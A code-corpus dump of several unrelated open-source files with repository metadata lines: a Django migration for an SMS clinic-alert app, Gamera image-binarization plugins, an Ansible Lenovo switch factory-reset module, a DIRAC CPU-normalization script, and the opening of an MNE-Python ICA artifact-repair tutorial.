'opted_in': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'regiment': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'risk_profile': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'te_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.historicalvisit': {
'Meta': {'ordering': "('-history_id',)", 'object_name': 'HistoricalVisit'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 4, 17, 0, 0)'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Patient']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'te_visit_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'wrhi_orig_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_index': 'True'})
},
u'core.language': {
'Meta': {'object_name': 'Language'},
'attended_message': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'missed_message': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'tomorrow_message': ('django.db.models.fields.TextField', [], {}),
'twoweeks_message': ('django.db.models.fields.TextField', [], {})
},
u'core.messagetype': {
'Meta': {'object_name': 'MessageType'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Language']"}),
'message': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'core.msisdn': {
'Meta': {'ordering': "['-id']", 'object_name': 'MSISDN'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msisdn': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
u'core.patient': {
'Meta': {'ordering': "['created_at']", 'object_name': 'Patient'},
'active_msisdn': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.MSISDN']", 'null': 'True', 'blank': 'True'}),
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deceased': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disclosed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['core.Language']", 'null': 'True', 'blank': 'True'}),
'last_clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True', 'blank': 'True'}),
'msisdns': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'contacts'", 'symmetrical': 'False', 'to': u"orm['core.MSISDN']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'opted_in': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'regiment': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'risk_profile': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'te_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.pleasecallme': {
'Meta': {'object_name': 'PleaseCallMe'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'pcms'", 'null': 'True', 'to': u"orm['core.Clinic']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msisdn': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pcms'", 'to': u"orm['core.MSISDN']"}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'default': "'ot'", 'max_length': '2'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'core.visit': {
'Meta': {'ordering': "['date']", 'object_name': 'Visit'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Patient']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'te_visit_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'wrhi_orig_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_index': 'True'})
}
}
complete_apps = ['core']
|
praekelt/txtalert
|
txtalert/core/migrations/0023_auto__add_index_visit_wrhi_orig_date__add_index_visit_date__add_index_.py
|
Python
|
gpl-3.0
| 17,476
|
[
"VisIt"
] |
60fa4402a27da64aa25be51eca01089438c72000750df7255fa2476d3f039c64
|
#
# Copyright (C) 2005 John Ashley Burgoyne and Ichiro Fujinaga
# 2012 Andrew Hankinson
# 2011-2012 Christoph Dalitz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# TODO: Add GREY16 compatibility.
# TODO: Add Yanowitz and Bruckstein post-processing (a la Trier and Jain).
"""Adaptive binarization tools."""
from gamera.plugin import *
from gamera.args import NoneDefault
import _binarization
class image_mean(PluginFunction):
"""
Returns the mean over all pixels of an image as a FLOAT.
"""
category = "Binarization/RegionInformation"
return_type = Real("output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
def __call__(self):
return _binarization.image_mean(self)
__call__ = staticmethod(__call__)
class image_variance(PluginFunction):
"""
Returns the variance over all pixels of an image as a FLOAT.
"""
category = "Binarization/RegionInformation"
return_type = Real("output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
def __call__(self):
return _binarization.image_variance(self)
__call__ = staticmethod(__call__)
class mean_filter(PluginFunction):
"""
Returns the regional mean of an image as a FLOAT.
*region_size*
The size of the region in which to calculate a mean.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([Int("region size", default=5)])
doc_examples = [(GREYSCALE,), (GREY16,), (FLOAT,)]
def __call__(self, region_size=5):
return _binarization.mean_filter(self, region_size)
__call__ = staticmethod(__call__)
class variance_filter(PluginFunction):
"""
Returns the regional variance of an image as a FLOAT.
*means*
Pre-calculated means for each region.
*region_size*
The size of the region in which to calculate the variance.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([ImageType([FLOAT], "means"),
Int("region size", default=5)])
def __call__(self, means, region_size=5):
return _binarization.variance_filter(self, means, region_size)
__call__ = staticmethod(__call__)
class wiener_filter(PluginFunction):
"""
Adaptive Wiener filter for de-noising.
See:
J. Lim. 2001. *Two-Dimensional Signal Processing.* Englewood
Cliffs: Prentice Hall.
*region_size*
The size of the region within which to calculate the filter
coefficients.
*noise_variance*
Variance of the noise in the image. If negative, estimated
automatically as the median of local variances.
"""
category = "Filter"
return_type = ImageType([GREYSCALE,GREY16,FLOAT], "output")
self_type = ImageType([GREYSCALE,GREY16,FLOAT])
args = Args([Int("region size", default=5),
Real("noise variance", default=-1.0)])
doc_examples = [(GREYSCALE,), (GREY16,), (FLOAT,)]
def __call__(self, region_size=5, noise_variance=-1):
return _binarization.wiener_filter(self, region_size, noise_variance)
__call__ = staticmethod(__call__)
class niblack_threshold(PluginFunction):
"""
Creates a binary image using Niblack's adaptive algorithm.
Niblack, W. 1986. *An Introduction to Digital Image Processing.* Englewood
Cliffs, NJ: Prentice Hall.
Like the QGAR library, there are two extra global thresholds for
the lightest and darkest regions.
*region_size*
The size of the region in which to calculate a threshold.
*sensitivity*
The sensitivity weight on the variance.
*lower bound*
A global threshold beneath which all pixels are considered black.
*upper bound*
A global threshold above which all pixels are considered white.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([Int("region size", default=15),
Real("sensitivity", default=-0.2),
Int("lower bound", range=(0,255), default=20),
Int("upper bound", range=(0,255), default=150)])
doc_examples = [(GREYSCALE,)]
def __call__(self,
region_size=15,
sensitivity=-0.2,
lower_bound=20,
upper_bound=150):
return _binarization.niblack_threshold(self,
region_size,
sensitivity,
lower_bound,
upper_bound)
__call__ = staticmethod(__call__)
class sauvola_threshold(PluginFunction):
"""
Creates a binary image using Sauvola's adaptive algorithm.
Sauvola, J. and M. Pietikainen. 2000. Adaptive document image
binarization. *Pattern Recognition* 33: 225--236.
Like the QGAR library, there are two extra global thresholds for
the lightest and darkest regions.
*region_size*
The size of the region in which to calculate a threshold.
*sensitivity*
The sensitivity weight on the adjusted variance.
*dynamic_range*
The dynamic range of the variance.
*lower bound*
A global threshold beneath which all pixels are considered black.
*upper bound*
A global threshold above which all pixels are considered white.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([Int("region size", default=15),
Real("sensitivity", default=0.5),
Int("dynamic range", range=(1, 255), default=128),
Int("lower bound", range=(0,255), default=20),
Int("upper bound", range=(0,255), default=150)])
doc_examples = [(GREYSCALE,)]
def __call__(self,
region_size=15,
sensitivity=0.5,
dynamic_range=128,
lower_bound=20,
upper_bound=150):
return _binarization.sauvola_threshold(self,
region_size,
sensitivity,
dynamic_range,
lower_bound,
upper_bound)
__call__ = staticmethod(__call__)
class gatos_background(PluginFunction):
"""
Estimates the background of an image according to Gatos et al.'s
method. See:
Gatos, Basilios, Ioannis Pratikakis, and Stavros
J. Perantonis. 2004. An adaptive binarization technique for low
quality historical documents. *Lecture Notes in Computer
Science* 3163: 102--113.
*region_size*
Region size for interpolation.
*binarization*
A preliminary binarization of the image.
"""
category = "Binarization/RegionInformation"
return_type = ImageType([GREYSCALE], "output")
self_type = ImageType([GREYSCALE])
args = Args([ImageType([ONEBIT], "binarization"),
Int("region size", default=15)])
def __call__(self, binarization, region_size=15):
return _binarization.gatos_background(self, binarization, region_size)
__call__ = staticmethod(__call__)
class gatos_threshold(PluginFunction):
"""
Thresholds an image according to Gatos et al.'s method. See:
Gatos, Basilios, Ioannis Pratikakis, and Stavros
J. Perantonis. 2004. An adaptive binarization technique for low
quality historical documents. *Lecture Notes in Computer
Science* 3163: 102-113.
*background*
Estimated background of the image.
*binarization*
A preliminary binarization of the image.
Use the default settings for the other parameters unless you know
what you are doing.
"""
return_type = ImageType([ONEBIT], "output")
self_type = ImageType([GREYSCALE])
args = Args([ImageType([GREYSCALE], "background"),
ImageType([ONEBIT], "binarization"),
Real("q", default=0.6),
Real("p1", default=0.5),
Real("p2", default=0.8)])
def __call__(self, background, binarization, q=0.6, p1=0.5, p2=0.8):
return _binarization.gatos_threshold(self,
background,
binarization,
q,
p1,
p2)
__call__ = staticmethod(__call__)
class white_rohrer_threshold(PluginFunction):
"""
Creates a binary image using White and Rohrer's dynamic thresholding
algorithm. It is the first of the two algorithms described in:
J. M. White and G. D. Rohrer. 1983. Image thresholding for optical
character recognition and other applications requiring character
image extraction. *IBM J. Res. Dev.* 27(4), pp. 400-411
The algorithm uses a 'running' average instead of true average of
the gray values in the neighborhood. The lookahead parameter
gives the number of lookahead pixels used in the biased running
average that is used in deciding the threshold at each pixel
location.
*x_lookahead*
the number of lookahead pixels in the horizontal direction for
computing the running average. White and Rohrer suggest a value
of 8 for a 240 dpi scanning resolution.
*y_lookahead*
number of lines used for further averaging from the horizontal
averages.
The other parameters are for calculating biased running average.
Without bias the thresholding decision would be determined by
noise fluctuations in uniform areas.
This implementation uses code from XITE__.
.. __: http://www.ifi.uio.no/forskning/grupper/dsb/Software/Xite/
.. note::
Permission to use, copy, modify and distribute this software
and its documentation for any purpose and without fee is hereby
granted, provided that this copyright notice appear in all
copies and that both that copyright notice and this permission
notice appear in supporting documentation and that the name of
B-lab, Department of Informatics or University of Oslo not be
used in advertising or publicity pertaining to distribution of
the software without specific, written prior permission.
B-LAB DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL B-LAB BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
THIS SOFTWARE.
"""
return_type = ImageType([ONEBIT], "onebit")
self_type = ImageType([GREYSCALE])
args = Args([Int("x lookahead", default=8),
Int("y lookahead", default=1),
Int("bias mode", default=0),
Int("bias factor", default=100),
Int("f factor",default=100),
Int("g factor",default=100)])
author = "Uma Kompella (using code from the XITE library)"
doc_examples = [(GREYSCALE,)]
def __call__(self, x_lookahead=8, y_lookahead=1, bias_mode=0,
bias_factor=100, f_factor=100, g_factor=100):
return _binarization.white_rohrer_threshold(
self,
x_lookahead,
y_lookahead,
bias_mode,
bias_factor,
f_factor,
g_factor)
__call__ = staticmethod(__call__)
class shading_subtraction(PluginFunction):
"""
Thresholds an image after subtracting a -possibly shaded- background.
First the background image is extracted with a maximum filter with a
*k\*k* window, and this image is subtracted from the original image.
On the difference image, a threshold is applied, and the inverted
image thereof is the binarization result.
Parameters:
*k*
Window size of the maximum filter. Must be odd. For decent results,
it must be chosen so large that every window includes at least one
background pixel.
*threshold*
Threshold applied to the difference image. A possibly reasonable
value might lie around 20. When ``None``, the threshold is
determined automatically with otsu_find_threshold_.
.. _otsu_find_threshold: binarization.html#otsu-find-threshold
Reference: K.D. Toennies: *Grundlagen der Bildverarbeitung.*
Pearson Studium, 2005, p.202
"""
author = "Christoph Dalitz"
return_type = ImageType([ONEBIT], "onebit")
self_type = ImageType([GREYSCALE])
args = Args([Int("k", default=7), Int("threshold", default=NoneDefault)])
pure_python = True
doc_examples = [(GREYSCALE,)]
def __call__(self, k=7, threshold=None):
#background = self.rank(k*k,k,border_treatment=1)
background = self.min_max_filter(k,1)
backfloat = background.to_float()
imgfloat = self.to_float()
difffloat = backfloat.subtract_images(imgfloat)
if threshold is None:
diffgrey = difffloat.to_greyscale()
diffgrey.invert()
return diffgrey.otsu_threshold()
else:
onebit = difffloat.threshold(threshold)
onebit.invert()
return onebit
__call__ = staticmethod(__call__)
class brink_threshold(PluginFunction):
"""
Calculates threshold for image with Brink and Pendock's minimum-cross
entropy method and returns corrected image. It is best used for binarising
images with dark, near-black foreground and significant bleed-through.
To that end, it generally predicts lower thresholds than other
thresholding algorithms.
Reference: A.D. Brink, N.E. Pendock: Minimum cross-entropy threshold selection.
Pattern Recognition 29 (1), 1996. 179-188.
"""
author = "Johanna Devaney, Brian Stern"
self_type = ImageType([GREYSCALE])
return_type = ImageType([ONEBIT], "onebit")
doc_examples = [(GREYSCALE,)]
def __call__(self):
return _binarization.brink_threshold(self)
__call__ = staticmethod(__call__)
class BinarizationGenerator(PluginModule):
category = "Binarization"
cpp_headers = ["binarization.hpp"]
functions = [image_mean,
image_variance,
mean_filter,
variance_filter,
wiener_filter,
niblack_threshold,
sauvola_threshold,
gatos_background,
gatos_threshold,
white_rohrer_threshold,
shading_subtraction,
brink_threshold]
author = "John Ashley Burgoyne and Ichiro Fujinaga"
url = "http://gamera.sourceforge.net/"
module = BinarizationGenerator()
|
hsnr-gamera/gamera
|
gamera/plugins/binarization.py
|
Python
|
gpl-2.0
| 15,930
|
[
"Brian"
] |
aaafd2da41c685f82230f9aebaf979351730b4fb908c0fe73b08723564d21786
|
import bge
class Ressource(bge.types.KX_GameObject):
def __init__(self, parent):
self.material = 10000
class Mine(Ressource):
def __init__(self, parent):
super(Mine, self).__init__(parent)
self.material = 10000
class Tree(Ressource):
def __init__(self, parent):
super(Tree, self).__init__(parent)
self.material = 10000
class Crystal(Ressource):
def __init__(self, parent):
super(Crystal, self).__init__(parent)
self.material = 10000
|
folkrav/rts-b51
|
src/projectX/ressource.py
|
Python
|
gpl-3.0
| 519
|
[
"CRYSTAL"
] |
aafd27a6f9b1ec82498e179176767ec6203030f78643723694074d6193dcde48
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Reset to factory settings of Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_factory
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS
description:
- This module allows you to reset a switch's startup configuration. The method provides a way to reset the
startup configuration to its factory settings. This is helpful when you want to move the switch to another
topology as a new network device.
This module uses SSH to manage network device configuration.
The results of the operation can be viewed in results directory.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_reload. These are written in the main.yml file of the tasks directory.
---
- name: Test Reset to factory
cnos_factory:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}"
password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Startup Config is Reset to factory settings"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import time
import re
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save erase \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn)
output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
hryamzik/ansible
|
lib/ansible/modules/network/cnos/cnos_factory.py
|
Python
|
gpl-3.0
| 5,299
|
[
"VisIt"
] |
a0ef776eb2c2ef0ac85d6475230556d46b754003bb70381427cd20be198a1389
|
#!/usr/bin/env python
########################################################################
# File : dirac-wms-cpu-normalization
# Author : Ricardo Graciani
########################################################################
"""
Determine Normalization for current CPU
"""
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
Script.registerSwitch( "U", "Update", "Update dirac.cfg with the resulting value" )
Script.registerSwitch( "R:", "Reconfig=", "Update given configuration file with the resulting value" )
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ' % Script.scriptName ] ) )
Script.parseCommandLine( ignoreErrors = True )
update = False
configFile = None
for unprocSw in Script.getUnprocessedSwitches():
if unprocSw[0] in ( "U", "Update" ):
update = True
elif unprocSw[0] in ( "R", "Reconfig" ):
configFile = unprocSw[1]
if __name__ == "__main__":
from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUNormalization
result = getCPUNormalization()
if not result['OK']:
DIRAC.gLogger.error( result['Message'] )
norm = int( ( result['Value']['NORM'] + 0.05 ) * 10 ) / 10.
DIRAC.gLogger.notice( 'Normalization for current CPU is %.1f %s' % ( norm, result['Value']['UNIT'] ) )
if update:
DIRAC.gConfig.setOptionValue( '/LocalSite/CPUScalingFactor', norm )
DIRAC.gConfig.setOptionValue( '/LocalSite/CPUNormalizationFactor', norm )
DIRAC.gConfig.dumpLocalCFGToFile( DIRAC.gConfig.diracConfigFilePath )
if configFile:
from DIRAC.Core.Utilities.CFG import CFG
cfg = CFG()
try:
# Attempt to open the given file
cfg.loadFromFile( configFile )
except:
pass
# Create the section if it does not exist
if not cfg.existsKey( 'LocalSite' ):
cfg.createNewSection( 'LocalSite' )
cfg.setOption( '/LocalSite/CPUScalingFactor', norm )
cfg.setOption( '/LocalSite/CPUNormalizationFactor', norm )
cfg.writeToFile( configFile )
DIRAC.exit()
|
sposs/DIRAC
|
WorkloadManagementSystem/scripts/dirac-wms-cpu-normalization.py
|
Python
|
gpl-3.0
| 2,118
|
[
"DIRAC"
] |
59ebb5d9fa3d99f3d94d00d899f390faa830c60292ff9277eaaee3d131b3bc09
|
# -*- coding: utf-8 -*-
"""
.. _tut-artifact-ica:
Repairing artifacts with ICA
============================
This tutorial covers the basics of independent components analysis (ICA) and
shows how ICA can be used for artifact repair; an extended example illustrates
repair of ocular and heartbeat artifacts. For conceptual background on ICA, see
:ref:`this scikit-learn tutorial
<sphx_glr_auto_examples_decomposition_plot_ica_blind_source_separation.py>`.
We begin as always by importing the necessary Python modules and loading some
:ref:`example data <sample-dataset>`. Because ICA can be computationally
intense, we'll also crop the data to 60 seconds; and to save ourselves from
repeatedly typing ``mne.preprocessing`` we'll directly import a few functions
and classes from that submodule:
"""
# %%
import os
import mne
from mne.preprocessing import (ICA, create_eog_epochs, create_ecg_epochs,
corrmap)
sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file)
raw.crop(tmax=60.)
# %%
# .. note::
# Before applying ICA (or any artifact repair strategy), be sure to observe
# the artifacts in your data to make sure you choose the right repair tool.
# Sometimes the right tool is no tool at all — if the artifacts are small
# enough you may not even need to repair them to get good analysis results.
# See :ref:`tut-artifact-overview` for guidance on detecting and
# visualizing various types of artifact.
#
# What is ICA?
# ^^^^^^^^^^^^
#
# Independent components analysis (ICA) is a technique for estimating
# independent source signals from a set of recordings in which the source
# signals were mixed together in unknown ratios. A common example of this is
# the problem of `blind source separation`_: with 3 musical instruments playing
# in the same room, and 3 microphones recording the performance (each picking
# up all 3 instruments, but at varying levels), can you somehow "unmix" the
# signals recorded by the 3 microphones so that you end up with a separate
# "recording" isolating the sound of each instrument?
#
# It is not hard to see how this analogy applies to EEG/MEG analysis: there are
# many "microphones" (sensor channels) simultaneously recording many
# "instruments" (blinks, heartbeats, activity in different areas of the brain,
# muscular activity from jaw clenching or swallowing, etc). As long as these
# various source signals are `statistically independent`_ and non-gaussian, it
# is usually possible to separate the sources using ICA, and then re-construct
# the sensor signals after excluding the sources that are unwanted.
#
#
# ICA in MNE-Python
# ~~~~~~~~~~~~~~~~~
#
# .. sidebar:: ICA and dimensionality reduction
#
# If you want to perform ICA with *no* dimensionality reduction (other than
# the number of Independent Components (ICs) given in ``n_components``, and
# any subsequent exclusion of ICs you specify in ``ICA.exclude``), simply
# pass ``n_components``.
#
# However, if you *do* want to reduce dimensionality, consider this
# example: if you have 300 sensor channels and you set ``n_components=50``
# during instantiation and pass ``n_pca_components=None`` to
# `~mne.preprocessing.ICA.apply`, then the the first 50
# PCs are sent to the ICA algorithm (yielding 50 ICs), and during
# reconstruction `~mne.preprocessing.ICA.apply` will use the 50 ICs
# plus PCs number 51-300 (the full PCA residual). If instead you specify
# ``n_pca_components=120`` in `~mne.preprocessing.ICA.apply`, it will
# reconstruct using the 50 ICs plus the first 70 PCs in the PCA residual
# (numbers 51-120), thus discarding the smallest 180 components.
#
# **If you have previously been using EEGLAB**'s ``runica()`` and are
# looking for the equivalent of its ``'pca', n`` option to reduce
# dimensionality, set ``n_components=n`` during initialization and pass
# ``n_pca_components=n`` to `~mne.preprocessing.ICA.apply`.
#
# MNE-Python implements three different ICA algorithms: ``fastica`` (the
# default), ``picard``, and ``infomax``. FastICA and Infomax are both in fairly
# widespread use; Picard is a newer (2017) algorithm that is expected to
# converge faster than FastICA and Infomax, and is more robust than other
# algorithms in cases where the sources are not completely independent, which
# typically happens with real EEG/MEG data. See
# :footcite:`AblinEtAl2018` for more information.
#
# The ICA interface in MNE-Python is similar to the interface in
# `scikit-learn`_: some general parameters are specified when creating an
# `~mne.preprocessing.ICA` object, then the `~mne.preprocessing.ICA` object is
# fit to the data using its `~mne.preprocessing.ICA.fit` method. The results of
# the fitting are added to the `~mne.preprocessing.ICA` object as attributes
# that end in an underscore (``_``), such as ``ica.mixing_matrix_`` and
# ``ica.unmixing_matrix_``. After fitting, the ICA component(s) that you want
# to remove must be chosen, and the ICA fit must then be applied to the
# `~mne.io.Raw` or `~mne.Epochs` object using the `~mne.preprocessing.ICA`
# object's `~mne.preprocessing.ICA.apply` method.
#
# As is typically done with ICA, the data are first scaled to unit variance and
# whitened using principal components analysis (PCA) before performing the ICA
# decomposition. This is a two-stage process:
#
# 1. To deal with different channel types having different units
# (e.g., Volts for EEG and Tesla for MEG), data must be pre-whitened.
